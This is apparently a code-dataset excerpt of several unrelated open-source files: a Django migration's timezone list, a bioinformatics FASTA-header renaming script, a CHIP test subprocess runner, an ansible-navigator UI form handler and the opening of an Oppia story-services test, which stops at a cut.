(b'Africa/Bamako', b'(GMT+0000) Africa/Bamako'), (b'Africa/Banjul', b'(GMT+0000) Africa/Banjul'), (b'Africa/Bissau', b'(GMT+0000) Africa/Bissau'), (b'Africa/Casablanca', b'(GMT+0000) Africa/Casablanca'), (b'Africa/Conakry', b'(GMT+0000) Africa/Conakry'), (b'Africa/Dakar', b'(GMT+0000) Africa/Dakar'), 
(b'Africa/El_Aaiun', b'(GMT+0000) Africa/El_Aaiun'), (b'Africa/Freetown', b'(GMT+0000) Africa/Freetown'), (b'Africa/Lome', b'(GMT+0000) Africa/Lome'), (b'Africa/Monrovia', b'(GMT+0000) Africa/Monrovia'), (b'Africa/Nouakchott', b'(GMT+0000) Africa/Nouakchott'), (b'Africa/Ouagadougou', b'(GMT+0000) Africa/Ouagadougou'), (b'Africa/Sao_Tome', b'(GMT+0000) Africa/Sao_Tome'), (b'America/Danmarkshavn', b'(GMT+0000) America/Danmarkshavn'), (b'America/Scoresbysund', b'(GMT+0000) America/Scoresbysund'), (b'Atlantic/Azores', b'(GMT+0000) Atlantic/Azores'), (b'Atlantic/Reykjavik', b'(GMT+0000) Atlantic/Reykjavik'), (b'Atlantic/St_Helena', b'(GMT+0000) Atlantic/St_Helena'), (b'GMT', b'(GMT+0000) GMT'), (b'UTC', b'(GMT+0000) UTC'), (b'Africa/Algiers', b'(GMT+0100) Africa/Algiers'), (b'Africa/Bangui', b'(GMT+0100) Africa/Bangui'), (b'Africa/Brazzaville', b'(GMT+0100) Africa/Brazzaville'), (b'Africa/Douala', b'(GMT+0100) Africa/Douala'), (b'Africa/Kinshasa', b'(GMT+0100) Africa/Kinshasa'), (b'Africa/Lagos', b'(GMT+0100) Africa/Lagos'), (b'Africa/Libreville', b'(GMT+0100) Africa/Libreville'), (b'Africa/Luanda', b'(GMT+0100) Africa/Luanda'), (b'Africa/Malabo', b'(GMT+0100) Africa/Malabo'), (b'Africa/Ndjamena', b'(GMT+0100) Africa/Ndjamena'), (b'Africa/Niamey', b'(GMT+0100) Africa/Niamey'), (b'Africa/Porto-Novo', b'(GMT+0100) Africa/Porto-Novo'), (b'Africa/Tunis', b'(GMT+0100) Africa/Tunis'), (b'Africa/Windhoek', b'(GMT+0100) Africa/Windhoek'), (b'Atlantic/Canary', b'(GMT+0100) Atlantic/Canary'), (b'Atlantic/Faroe', b'(GMT+0100) Atlantic/Faroe'), (b'Atlantic/Madeira', b'(GMT+0100) Atlantic/Madeira'), (b'Europe/Dublin', b'(GMT+0100) Europe/Dublin'), (b'Europe/Guernsey', b'(GMT+0100) Europe/Guernsey'), (b'Europe/Isle_of_Man', b'(GMT+0100) Europe/Isle_of_Man'), (b'Europe/Jersey', b'(GMT+0100) Europe/Jersey'), (b'Europe/Lisbon', b'(GMT+0100) Europe/Lisbon'), (b'Europe/London', b'(GMT+0100) Europe/London'), (b'Africa/Blantyre', b'(GMT+0200) Africa/Blantyre'), (b'Africa/Bujumbura', b'(GMT+0200) Africa/Bujumbura'), (b'Africa/Cairo', b'(GMT+0200) Africa/Cairo'), (b'Africa/Ceuta', b'(GMT+0200) Africa/Ceuta'), (b'Africa/Gaborone', b'(GMT+0200) Africa/Gaborone'), (b'Africa/Harare', b'(GMT+0200) Africa/Harare'), (b'Africa/Johannesburg', b'(GMT+0200) Africa/Johannesburg'), (b'Africa/Kigali', b'(GMT+0200) Africa/Kigali'), (b'Africa/Lubumbashi', b'(GMT+0200) Africa/Lubumbashi'), (b'Africa/Lusaka', b'(GMT+0200) Africa/Lusaka'), (b'Africa/Maputo', b'(GMT+0200) Africa/Maputo'), (b'Africa/Maseru', b'(GMT+0200) Africa/Maseru'), (b'Africa/Mbabane', b'(GMT+0200) Africa/Mbabane'), (b'Africa/Tripoli', b'(GMT+0200) Africa/Tripoli'), (b'Antarctica/Troll', b'(GMT+0200) Antarctica/Troll'), (b'Arctic/Longyearbyen', b'(GMT+0200) Arctic/Longyearbyen'), (b'Europe/Amsterdam', b'(GMT+0200) Europe/Amsterdam'), (b'Europe/Andorra', b'(GMT+0200) Europe/Andorra'), (b'Europe/Belgrade', b'(GMT+0200) Europe/Belgrade'), (b'Europe/Berlin', b'(GMT+0200) Europe/Berlin'), (b'Europe/Bratislava', b'(GMT+0200) Europe/Bratislava'), (b'Europe/Brussels', b'(GMT+0200) Europe/Brussels'), (b'Europe/Budapest', b'(GMT+0200) Europe/Budapest'), (b'Europe/Busingen', b'(GMT+0200) Europe/Busingen'), (b'Europe/Copenhagen', b'(GMT+0200) Europe/Copenhagen'), (b'Europe/Gibraltar', b'(GMT+0200) Europe/Gibraltar'), (b'Europe/Kaliningrad', b'(GMT+0200) Europe/Kaliningrad'), (b'Europe/Ljubljana', b'(GMT+0200) Europe/Ljubljana'), (b'Europe/Luxembourg', b'(GMT+0200) Europe/Luxembourg'), (b'Europe/Madrid', b'(GMT+0200) Europe/Madrid'), (b'Europe/Malta', b'(GMT+0200) 
Europe/Malta'), (b'Europe/Monaco', b'(GMT+0200) Europe/Monaco'), (b'Europe/Oslo', b'(GMT+0200) Europe/Oslo'), (b'Europe/Paris', b'(GMT+0200) Europe/Paris'), (b'Europe/Podgorica', b'(GMT+0200) Europe/Podgorica'), (b'Europe/Prague', b'(GMT+0200) Europe/Prague'), (b'Europe/Rome', b'(GMT+0200) Europe/Rome'), (b'Europe/San_Marino', b'(GMT+0200) Europe/San_Marino'), (b'Europe/Sarajevo', b'(GMT+0200) Europe/Sarajevo'), (b'Europe/Skopje', b'(GMT+0200) Europe/Skopje'), (b'Europe/Stockholm', b'(GMT+0200) Europe/Stockholm'), (b'Europe/Tirane', b'(GMT+0200) Europe/Tirane'), (b'Europe/Vaduz', b'(GMT+0200) Europe/Vaduz'), (b'Europe/Vatican', b'(GMT+0200) Europe/Vatican'), (b'Europe/Vienna', b'(GMT+0200) Europe/Vienna'), (b'Europe/Warsaw', b'(GMT+0200) Europe/Warsaw'), (b'Europe/Zagreb', b'(GMT+0200) Europe/Zagreb'), (b'Europe/Zurich', b'(GMT+0200) Europe/Zurich'), (b'Africa/Addis_Ababa', b'(GMT+0300) Africa/Addis_Ababa'), (b'Africa/Asmara', b'(GMT+0300) Africa/Asmara'), (b'Africa/Dar_es_Salaam', b'(GMT+0300) Africa/Dar_es_Salaam'), (b'Africa/Djibouti', b'(GMT+0300) Africa/Djibouti'), (b'Africa/Juba', b'(GMT+0300) Africa/Juba'), (b'Africa/Kampala', b'(GMT+0300) Africa/Kampala'), (b'Africa/Khartoum', b'(GMT+0300) Africa/Khartoum'), (b'Africa/Mogadishu', b'(GMT+0300) Africa/Mogadishu'), (b'Africa/Nairobi', b'(GMT+0300) Africa/Nairobi'), (b'Antarctica/Syowa', b'(GMT+0300) Antarctica/Syowa'), (b'Asia/Aden', b'(GMT+0300) Asia/Aden'), (b'Asia/Amman', b'(GMT+0300) Asia/Amman'), (b'Asia/Baghdad', b'(GMT+0300) Asia/Baghdad'), (b'Asia/Bahrain', b'(GMT+0300) Asia/Bahrain'), (b'Asia/Beirut', b'(GMT+0300) Asia/Beirut'), (b'Asia/Damascus', b'(GMT+0300) Asia/Damascus'), (b'Asia/Gaza', b'(GMT+0300) Asia/Gaza'), (b'Asia/Hebron', b'(GMT+0300) Asia/Hebron'), (b'Asia/Jerusalem', b'(GMT+0300) Asia/Jerusalem'), (b'Asia/Kuwait', b'(GMT+0300) Asia/Kuwait'), (b'Asia/Nicosia', b'(GMT+0300) Asia/Nicosia'), (b'Asia/Qatar', b'(GMT+0300) Asia/Qatar'), (b'Asia/Riyadh', b'(GMT+0300) Asia/Riyadh'), (b'Europe/Athens', b'(GMT+0300) Europe/Athens'), (b'Europe/Bucharest', b'(GMT+0300) Europe/Bucharest'), (b'Europe/Chisinau', b'(GMT+0300) Europe/Chisinau'), (b'Europe/Helsinki', b'(GMT+0300) Europe/Helsinki'), (b'Europe/Istanbul', b'(GMT+0300) Europe/Istanbul'), (b'Europe/Kiev', b'(GMT+0300) Europe/Kiev'), (b'Europe/Mariehamn', b'(GMT+0300) Europe/Mariehamn'), (b'Europe/Minsk', b'(GMT+0300) Europe/Minsk'), (b'Europe/Moscow', b'(GMT+0300) Europe/Moscow'), (b'Europe/Riga', b'(GMT+0300) Europe/Riga'), (b'Europe/Simferopol', b'(GMT+0300) Europe/Simferopol'), (b'Europe/Sofia', b'(GMT+0300) Europe/Sofia'), (b'Europe/Tallinn', b'(GMT+0300) Europe/Tallinn'), (b'Europe/Uzhgorod', b'(GMT+0300) Europe/Uzhgorod'), (b'Europe/Vilnius', b'(GMT+0300) Europe/Vilnius'), (b'Europe/Volgograd', b'(GMT+0300) Europe/Volgograd'), (b'Europe/Zaporozhye', b'(GMT+0300) Europe/Zaporozhye'), (b'Indian/Antananarivo', b'(GMT+0300) Indian/Antananarivo'), (b'Indian/Comoro', b'(GMT+0300) Indian/Comoro'), (b'Indian/Mayotte', b'(GMT+0300) Indian/Mayotte'), (b'Asia/Dubai', b'(GMT+0400) Asia/Dubai'), (b'Asia/Muscat', b'(GMT+0400) Asia/Muscat'), (b'Asia/Tbilisi', b'(GMT+0400) Asia/Tbilisi'), (b'Asia/Yerevan', b'(GMT+0400) Asia/Yerevan'), (b'Europe/Samara', b'(GMT+0400) Europe/Samara'), (b'Indian/Mahe', b'(GMT+0400) Indian/Mahe'), (b'Indian/Mauritius', b'(GMT+0400) Indian/Mauritius'), (b'Indian/Reunion', b'(GMT+0400) Indian/Reunion'), (b'Asia/Kabul', b'(GMT+0430) Asia/Kabul'), (b'Asia/Tehran', b'(GMT+0430) Asia/Tehran'), (b'Antarctica/Mawson', b'(GMT+0500) Antarctica/Mawson'), 
(b'Asia/Aqtau', b'(GMT+0500) Asia/Aqtau'), (b'Asia/Aqtobe', b'(GMT+0500) Asia/Aqtobe'), (b'Asia/Ashgabat', b'(GMT+0500) Asia/Ashgabat'), (b'Asia/Baku', b'(GMT+0500) Asia/Baku'), (b'Asia/Dushanbe', b'(GMT+0500) Asia/Dushanbe'), (b'Asia/Karachi', b'(GMT+0500) Asia/Karachi'), (b'Asia/Oral', b'(GMT+0500) Asia/Oral'), (b'Asia/Samarkand', b'(GMT+0500) Asia/Samarkand'), (b'Asia/Tashkent', b'(GMT+0500) Asia/Tashkent'), (b'Asia/Yekaterinburg', b'(GMT+0500) Asia/Yekaterinburg'), (b'Indian/Kerguelen', b'(GMT+0500) Indian/Kerguelen'), (b'Indian/Maldives', b'(GMT+0500) Indian/Maldives'), (b'Asia/Colombo', b'(GMT+0530) Asia/Colombo'), (b'Asia/Kolkata', b'(GMT+0530) Asia/Kolkata'), (b'Asia/Kathmandu', b'(GMT+0545) Asia/Kathmandu'), (b'Antarctica/Vostok', b'(GMT+0600) Antarctica/Vostok'), (b'Asia/Almaty', b'(GMT+0600) Asia/Almaty'), (b'Asia/Bishkek', b'(GMT+0600) Asia/Bishkek'), (b'Asia/Dhaka', b'(GMT+0600) Asia/Dhaka'), (b'Asia/Novosibirsk', b'(GMT+0600) Asia/Novosibirsk'), (b'Asia/Omsk', b'(GMT+0600) Asia/Omsk'), (b'Asia/Qyzylorda', b'(GMT+0600) Asia/Qyzylorda'), (b'Asia/Thimphu', b'(GMT+0600) Asia/Thimphu'), (b'Asia/Urumqi', b'(GMT+0600) Asia/Urumqi'), (b'Indian/Chagos', b'(GMT+0600) Indian/Chagos'), (b'Asia/Rangoon', b'(GMT+0630) Asia/Rangoon'), (b'Indian/Cocos', b'(GMT+0630) Indian/Cocos'), (b'Antarctica/Davis', b'(GMT+0700) Antarctica/Davis'), (b'Asia/Bangkok', b'(GMT+0700) Asia/Bangkok'), (b'Asia/Ho_Chi_Minh', b'(GMT+0700) Asia/Ho_Chi_Minh'), (b'Asia/Jakarta', b'(GMT+0700) Asia/Jakarta'), (b'Asia/Krasnoyarsk', b'(GMT+0700) Asia/Krasnoyarsk'), (b'Asia/Novokuznetsk', b'(GMT+0700) Asia/Novokuznetsk'), (b'Asia/Phnom_Penh', b'(GMT+0700) Asia/Phnom_Penh'), (b'Asia/Pontianak', b'(GMT+0700) Asia/Pontianak'), (b'Asia/Vientiane', b'(GMT+0700) Asia/Vientiane'), (b'Indian/Christmas', b'(GMT+0700) Indian/Christmas'), (b'Antarctica/Casey', b'(GMT+0800) Antarctica/Casey'), (b'Asia/Brunei', b'(GMT+0800) Asia/Brunei'), (b'Asia/Chita', b'(GMT+0800) Asia/Chita'), (b'Asia/Hong_Kong', b'(GMT+0800) Asia/Hong_Kong'), (b'Asia/Hovd', b'(GMT+0800) Asia/Hovd'), (b'Asia/Irkutsk', b'(GMT+0800) Asia/Irkutsk'), (b'Asia/Kuala_Lumpur', b'(GMT+0800) Asia/Kuala_Lumpur'), (b'Asia/Kuching', b'(GMT+0800) Asia/Kuching'), (b'Asia/Macau', b'(GMT+0800) Asia/Macau'), (b'Asia/Makassar', b'(GMT+0800) Asia/Makassar'), (b'Asia/Manila', b'(GMT+0800) Asia/Manila'), (b'Asia/Shanghai', b'(GMT+0800) Asia/Shanghai'), (b'Asia/Singapore', b'(GMT+0800) Asia/Singapore'), (b'Asia/Taipei', b'(GMT+0800) Asia/Taipei'), (b'Australia/Perth', b'(GMT+0800) Australia/Perth'), (b'Australia/Eucla', b'(GMT+0845) Australia/Eucla'), (b'Asia/Choibalsan', b'(GMT+0900) Asia/Choibalsan'), (b'Asia/Dili', b'(GMT+0900) Asia/Dili'), (b'Asia/Jayapura', b'(GMT+0900) Asia/Jayapura'), (b'Asia/Khandyga', b'(GMT+0900) Asia/Khandyga'), (b'Asia/Pyongyang', b'(GMT+0900) Asia/Pyongyang'), (b'Asia/Seoul', b'(GMT+0900) Asia/Seoul'), (b'Asia/Tokyo', b'(GMT+0900) Asia/Tokyo'), (b'Asia/Ulaanbaatar', b'(GMT+0900) Asia/Ulaanbaatar'), (b'Asia/Yakutsk', b'(GMT+0900) Asia/Yakutsk'), (b'Pacific/Palau', b'(GMT+0900) Pacific/Palau'), (b'Australia/Adelaide', b'(GMT+0930) Australia/Adelaide'), (b'Australia/Broken_Hill', b'(GMT+0930) Australia/Broken_Hill'), (b'Australia/Darwin', b'(GMT+0930) Australia/Darwin'), (b'Antarctica/DumontDUrville', b'(GMT+1000) Antarctica/DumontDUrville'), (b'Asia/Magadan', b'(GMT+1000) Asia/Magadan'), (b'Asia/Sakhalin', b'(GMT+1000) Asia/Sakhalin'), (b'Asia/Ust-Nera', b'(GMT+1000) Asia/Ust-Nera'), (b'Asia/Vladivostok', b'(GMT+1000) Asia/Vladivostok'), 
(b'Australia/Brisbane', b'(GMT+1000) Australia/Brisbane'), (b'Australia/Currie', b'(GMT+1000) Australia/Currie'), (b'Australia/Hobart', b'(GMT+1000) Australia/Hobart'), (b'Australia/Lindeman', b'(GMT+1000) Australia/Lindeman'), (b'Australia/Melbourne', b'(GMT+1000) Australia/Melbourne'), (b'Australia/Sydney', b'(GMT+1000) Australia/Sydney'), (b'Pacific/Chuuk', b'(GMT+1000) Pacific/Chuuk'), (b'Pacific/Guam', b'(GMT+1000) Pacific/Guam'), (b'Pacific/Port_Moresby', b'(GMT+1000) Pacific/Port_Moresby'), (b'Pacific/Saipan', b'(GMT+1000) Pacific/Saipan'), (b'Australia/Lord_Howe', b'(GMT+1030) Australia/Lord_Howe'), (b'Antarctica/Macquarie', b'(GMT+1100) Antarctica/Macquarie'), (b'Asia/Srednekolymsk', b'(GMT+1100) Asia/Srednekolymsk'), (b'Pacific/Bougainville', b'(GMT+1100) Pacific/Bougainville'), (b'Pacific/Efate', b'(GMT+1100) Pacific/Efate'), (b'Pacific/Guadalcanal', b'(GMT+1100) Pacific/Guadalcanal'), (b'Pacific/Kosrae', b'(GMT+1100) Pacific/Kosrae'), (b'Pacific/Noumea', b'(GMT+1100) Pacific/Noumea'), (b'Pacific/Pohnpei', b'(GMT+1100) Pacific/Pohnpei'), (b'Pacific/Norfolk', b'(GMT+1130) Pacific/Norfolk'), (b'Antarctica/McMurdo', b'(GMT+1200) Antarctica/McMurdo'), (b'Asia/Anadyr', b'(GMT+1200) Asia/Anadyr'), (b'Asia/Kamchatka', b'(GMT+1200) Asia/Kamchatka'), (b'Pacific/Auckland', b'(GMT+1200) Pacific/Auckland'), (b'Pacific/Fiji', b'(GMT+1200) Pacific/Fiji'), (b'Pacific/Funafuti', b'(GMT+1200) Pacific/Funafuti'), (b'Pacific/Kwajalein', b'(GMT+1200) Pacific/Kwajalein'), (b'Pacific/Majuro', b'(GMT+1200) Pacific/Majuro'), (b'Pacific/Nauru', b'(GMT+1200) Pacific/Nauru'), (b'Pacific/Tarawa', b'(GMT+1200) Pacific/Tarawa'), (b'Pacific/Wake', b'(GMT+1200) Pacific/Wake'), (b'Pacific/Wallis', b'(GMT+1200) Pacific/Wallis'), (b'Pacific/Chatham', b'(GMT+1245) Pacific/Chatham'), (b'Pacific/Apia', b'(GMT+1300) Pacific/Apia'), (b'Pacific/Enderbury', b'(GMT+1300) Pacific/Enderbury'), (b'Pacific/Fakaofo', b'(GMT+1300) Pacific/Fakaofo'), (b'Pacific/Tongatapu', b'(GMT+1300) Pacific/Tongatapu'), (b'Pacific/Kiritimati', b'(GMT+1400) Pacific/Kiritimati')])),
],
options={
'verbose_name': 'conference',
'verbose_name_plural': 'conferences',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Section',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=100, verbose_name='name')),
('slug', models.SlugField()),
('start_date', models.DateField(null=True, verbose_name='start date', blank=True)),
('end_date', models.DateField(null=True, verbose_name='end date', blank=True)),
('conference', models.ForeignKey(verbose_name='conference', to='conference.Conference')),
],
options={
'verbose_name': 'section',
'verbose_name_plural': 'sections',
},
bases=(models.Model,),
),
]
| 544.630435 | 23,334 | 0.690496 |
f5a6a6cbdde36e6007dbda681e3e49bd6a8a889b | 1,350 | py | Python | src/pdc2/scripts/fix_names_from_transdecoder.py | jlanga/smsk_selection | 08070c6d4a6fbd9320265e1e698c95ba80f81123 | ["MIT"] | 4 | 2021-07-18T05:20:20.000Z | 2022-01-03T10:22:33.000Z | src/pdc2/scripts/fix_names_from_transdecoder.py | jlanga/smsk_selection | 08070c6d4a6fbd9320265e1e698c95ba80f81123 | ["MIT"] | 1 | 2017-08-21T07:26:13.000Z | 2018-11-08T13:59:48.000Z | src/pdc2/scripts/fix_names_from_transdecoder.py | jlanga/smsk_orthofinder | 08070c6d4a6fbd9320265e1e698c95ba80f81123 | ["MIT"] | 2 | 2021-07-18T05:20:26.000Z | 2022-03-31T18:23:31.000Z |
"""
fix EST names in TransDecoder output (.transdecoder.pep / .transdecoder.cds) to taxonID@seqID
"""
import os,sys
#seq names look like
#>TR10000|c0_g1_i1|m.14496 TR10000|c0_g1_i1|g.14496 ORF TR10000|c0_g1_i1|g.14496 TR10000|c0_g1_i1|m.14496 type:5prime_partial len:180 (+) TR10000|c0_g1_i1:1-540(+)
#>cds.Mecr@gi_11549800_gb_BF478973_1_BF478973|m.9518 Mecr@gi_11549800_gb_BF478973_1_BF478973|g.9518 ORF Mecr@gi_11549800_gb_BF478973_1_BF478973|g.9518 Mecr@gi_11549800_gb_BF478973_1_BF478973|m.9518 type:3prime_partial len:195 (+) Mecr@gi_11549800_gb_BF478973_1_BF478973:86-667(+)
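# For example (the file and taxon names here are illustrative assumptions):
# when reading a file named "Mecr.fa.transdecoder.pep", taxonID below becomes
# "Mecr"; for a header such as the second sample above, the loop keeps the
# first whitespace-separated token, takes the text after its final "." as the
# sequence id, and rewrites the header as ">Mecr@9518".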
if __name__ =="__main__":
if len(sys.argv) != 3:
print "usage: python fix_names_from_transdecoder.py inDIR outDIR"
sys.exit()
inDIR = sys.argv[1]+"/"
outDIR = sys.argv[2]+"/"
for i in os.listdir(inDIR):
taxonID = i.split(".")[0]
if i.endswith("transdecoder.pep"):
outname = taxonID+".pep.fa"
elif i.endswith("transdecoder.cds"):
outname = taxonID+".cds.fa"
elif i.endswith(".Trinity.fasta"):
os.system("gzip "+inDIR+i)
continue
else: continue
print i
infile = open(inDIR+i,"rU")
outfile = open(outDIR+outname,"w")
for line in infile:
if line[0] == ">":
newid = line.split(" ")[0]
newid = newid.split(".")[-1]
outfile.write(">"+taxonID+"@"+newid+"\n")
else: outfile.write(line)
		outfile.close()
infile.close()
os.system("gzip "+inDIR+i)
| 31.395349 | 280 | 0.698519 |
aa17a09f4ea5c62aec96daa8d42affacf32687da | 3,460 | py | Python | scripts/tests/chiptest/runner.py | ChengqiangShe/connectedhomeip | 3a617aa821e7c84093ab17313d6ce02d3ec32219 | ["Apache-2.0"] | 3 | 2022-02-09T08:42:16.000Z | 2022-02-22T04:47:02.000Z | scripts/tests/chiptest/runner.py | ChengqiangShe/connectedhomeip | 3a617aa821e7c84093ab17313d6ce02d3ec32219 | ["Apache-2.0"] | 8 | 2020-07-07T21:51:44.000Z | 2021-07-26T13:43:00.000Z | scripts/tests/chiptest/runner.py | doublemis1/connectedhomeip | 6a08b0404b7b068fd080db504d3eb1edf4bef89f | ["Apache-2.0"] | 7 | 2021-04-26T06:22:35.000Z | 2021-12-16T07:10:43.000Z |
# Copyright (c) 2021 Project CHIP Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import subprocess
import sys
import threading
import time
import pty
import re
from dataclasses import dataclass
class LogPipe(threading.Thread):
def __init__(self, level, capture_delegate=None, name=None):
"""Setup the object with a logger and a loglevel
and start the thread
"""
threading.Thread.__init__(self)
self.daemon = False
self.level = level
if sys.platform == 'darwin':
self.fd_read, self.fd_write = pty.openpty()
else:
self.fd_read, self.fd_write = os.pipe()
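        # On macOS a pseudo-terminal is used instead of a plain pipe above,
        # presumably so that child processes see a tty and keep their output
        # line-buffered; this rationale is an inference, not stated upstream.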
self.pipeReader = os.fdopen(self.fd_read)
self.captured_logs = []
self.capture_delegate = capture_delegate
self.name = name
self.start()
def CapturedLogContains(self, txt: str):
return any(txt in l for l in self.captured_logs)
def FindLastMatchingLine(self, matcher):
for l in reversed(self.captured_logs):
match = re.match(matcher, l)
if match:
return match
return None
def fileno(self):
"""Return the write file descriptor of the pipe"""
return self.fd_write
def run(self):
"""Run the thread, logging everything."""
for line in iter(self.pipeReader.readline, ''):
logging.log(self.level, line.strip('\n'))
self.captured_logs.append(line)
if self.capture_delegate:
self.capture_delegate.Log(self.name, line)
self.pipeReader.close()
def close(self):
"""Close the write end of the pipe."""
os.close(self.fd_write)
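# A minimal usage sketch for LogPipe (the helper name and the 'echo hello'
# command are illustrative assumptions, not part of the original API): each
# pipe is handed to subprocess.Popen through its fileno(), the parent closes
# its write end so the reader thread sees EOF once the child exits, and the
# captured lines can then be inspected.
def _example_logpipe_usage():
    out_pipe = LogPipe(logging.INFO, name='demo OUT')
    err_pipe = LogPipe(logging.DEBUG, name='demo ERR')
    proc = subprocess.Popen(['echo', 'hello'], stdout=out_pipe, stderr=err_pipe)
    # Close the parent's copies of the write ends; the child keeps its own.
    out_pipe.close()
    err_pipe.close()
    proc.wait()
    # Join the reader threads so all output has been drained before checking.
    out_pipe.join()
    err_pipe.join()
    return out_pipe.CapturedLogContains('hello')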
class Runner:
def __init__(self, capture_delegate=None):
self.capture_delegate = capture_delegate
def RunSubprocess(self, cmd, name, wait=True, dependencies=[]):
outpipe = LogPipe(
logging.DEBUG, capture_delegate=self.capture_delegate, name=name + ' OUT')
errpipe = LogPipe(
logging.INFO, capture_delegate=self.capture_delegate, name=name + ' ERR')
if self.capture_delegate:
self.capture_delegate.Log(name, 'EXECUTING %r' % cmd)
s = subprocess.Popen(cmd, stdout=outpipe, stderr=errpipe)
outpipe.close()
errpipe.close()
if not wait:
return s, outpipe, errpipe
while s.poll() is None:
# dependencies MUST NOT be done
for dependency in dependencies:
if dependency.poll() is not None:
s.kill()
                    raise Exception("Unexpected return %d for %r" % (
                        dependency.poll(), dependency))
code = s.wait()
if code != 0:
raise Exception('Command %r failed: %d' % (cmd, code))
else:
logging.debug('Command %r completed with error code 0', cmd)
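    # Note on the contract above: with wait=True the call blocks, kills the
    # command and raises if any process in `dependencies` finishes first, and
    # raises if the command itself exits non-zero; with wait=False it returns
    # (process, out_pipe, err_pipe) and the caller must wait on the process
    # and manage the pipes itself.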
| 30.892857 | 86 | 0.621387 |
88a666529948068372d471e9d68f76dc1cce6597 | 847 | py | Python | src/ansible_navigator/ui_framework/form_handler_working.py | goneri/ansible-navigator | 59c5c4e9758404bcf363face09cf46c325b01ad3 | ["Apache-2.0"] | null | null | null | src/ansible_navigator/ui_framework/form_handler_working.py | goneri/ansible-navigator | 59c5c4e9758404bcf363face09cf46c325b01ad3 | ["Apache-2.0"] | null | null | null | src/ansible_navigator/ui_framework/form_handler_working.py | goneri/ansible-navigator | 59c5c4e9758404bcf363face09cf46c325b01ad3 | ["Apache-2.0"] | null | null | null |
"""working handler, instant 1112065
utf-8 max = 112064
"""
from typing import TYPE_CHECKING
from typing import List
from typing import Tuple
from .curses_window import CursesWindow
if TYPE_CHECKING:
from .field_working import FieldWorking # pylint: disable=cyclic-import
class FormHandlerWorking(CursesWindow):
    """handle form working notification"""
def __init__(self, screen, ui_config):
"""Initialize the handler for a form working notification.
:param screen: A curses window
:param ui_config: The current user interface configuration
"""
super().__init__(ui_config=ui_config)
self._screen = screen
@staticmethod
def handle(idx, form_fields: List) -> Tuple["FieldWorking", int]:
"""handle the information field, immediate return"""
return form_fields[idx], 112065
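        # The large constant returned above appears to act as an out-of-band
        # "key" value, one past the utf-8 maximum noted in the module
        # docstring, signalling that this field resolves instantly rather
        # than waiting for user input; this reading is an inference from the
        # docstring, not documented behaviour.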
| 26.46875 | 76 | 0.70366 |
0e1ace7891c411af6dfb381018dd4408151a9848 | 91,192 | py | Python | core/domain/story_services_test.py | WebFlakyTest/oppia | 520e35490eae8171beb035fbafc2948983abec75 | ["Apache-2.0"] | 1 | 2021-08-17T20:33:12.000Z | 2021-08-17T20:33:12.000Z | core/domain/story_services_test.py | WebFlakyTest/oppia | 520e35490eae8171beb035fbafc2948983abec75 | ["Apache-2.0"] | null | null | null | core/domain/story_services_test.py | WebFlakyTest/oppia | 520e35490eae8171beb035fbafc2948983abec75 | ["Apache-2.0"] | null | null | null |
# Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests the methods defined in story services."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import logging
import os
from constants import constants
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import fs_domain
from core.domain import param_domain
from core.domain import story_domain
from core.domain import story_fetchers
from core.domain import story_services
from core.domain import topic_fetchers
from core.domain import topic_services
from core.domain import user_services
from core.platform import models
from core.tests import test_utils
import feconf
import python_utils
import utils
(story_models, user_models) = models.Registry.import_models(
[models.NAMES.story, models.NAMES.user])
class StoryServicesUnitTests(test_utils.GenericTestBase):
"""Test the story services module."""
STORY_ID = None
EXP_ID = 'exp_id'
NODE_ID_1 = story_domain.NODE_ID_PREFIX + '1'
NODE_ID_2 = 'node_2'
USER_ID = 'user'
story = None
def setUp(self):
super(StoryServicesUnitTests, self).setUp()
self.signup('a@example.com', 'A')
self.signup('b@example.com', 'B')
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.user_id_a = self.get_user_id_from_email('a@example.com')
self.user_id_b = self.get_user_id_from_email('b@example.com')
self.user_id_admin = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.STORY_ID = story_services.get_new_story_id()
self.TOPIC_ID = topic_fetchers.get_new_topic_id()
self.save_new_topic(
self.TOPIC_ID, self.USER_ID, name='Topic',
abbreviated_name='topic-one', url_fragment='topic-one',
description='A new topic',
canonical_story_ids=[], additional_story_ids=[],
uncategorized_skill_ids=['skill_4'], subtopics=[],
next_subtopic_id=0)
self.save_new_story(self.STORY_ID, self.USER_ID, self.TOPIC_ID)
topic_services.add_canonical_story(
self.USER_ID, self.TOPIC_ID, self.STORY_ID)
self.save_new_valid_exploration(
self.EXP_ID, self.user_id_admin, end_state_name='End',
correctness_feedback_enabled=True)
self.publish_exploration(self.user_id_admin, self.EXP_ID)
changelist = [
story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': self.NODE_ID_1,
'title': 'Title 1'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': self.EXP_ID
})
]
story_services.update_story(
self.USER_ID, self.STORY_ID, changelist,
'Added node.')
self.story = story_fetchers.get_story_by_id(self.STORY_ID)
self.set_admins([self.ADMIN_USERNAME])
self.set_topic_managers([user_services.get_username(self.user_id_a)])
self.user_a = user_services.get_user_actions_info(self.user_id_a)
self.user_b = user_services.get_user_actions_info(self.user_id_b)
self.user_admin = user_services.get_user_actions_info(
self.user_id_admin)
def test_compute_summary(self):
story_summary = story_services.compute_summary_of_story(self.story)
